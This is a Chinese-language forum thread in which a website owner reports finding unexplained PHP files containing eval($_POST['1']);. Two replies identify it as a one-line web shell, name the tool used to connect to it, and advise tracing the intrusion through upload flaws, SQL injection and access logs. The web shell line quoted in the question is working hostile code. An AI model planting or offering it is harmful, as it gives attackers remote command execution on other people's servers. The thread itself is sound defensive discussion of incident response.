网站多了几个PHP,内容如下:eval($_POST['1']);有的是其他内容,我百度了一下发现时执行某些命令的,我测试了一下如果权限没限制好的话确实可以执行一些命令。请问除了设置权限,从代码级别可否做限制呢?有没有什么好办法呢?还有个PHP文件内容如下:还有文件,名字是:13686921256303.virus_killed内容是:请各位出出注意,谢谢了。
2 回答
函数式编程
TA贡献1807条经验 获得超9个赞
明显的是被上传一句话木马了啊!可以通过菜刀直接连接的,可以执行很多命令。修复的话要从根本上修复,看下网站是不是有上传漏洞,sql注入等问题。可以查看http的访问日志来看利用这个一句话执行了什么操作,排查网站是不是被提权,获取了服务器权限等。
Smart猫小萌
TA贡献1911条经验 获得超7个赞
修正要修正根上。与其费心让病毒代码“不能运行”,倒不如寻找病毒进入的来源——是从PHP程序的漏洞引入的,还是从服务器环境的不安全引入的。另外提一下,使用虚拟主机在安全性上可能不是一个好主意。因为你与他人分享不隔离的物理设备与LAMP环境,虽然理论上Linux下用户之间的隔离很好,但实际上不隔离开还是风险很高。
添加回答
举报
0/150
提交
取消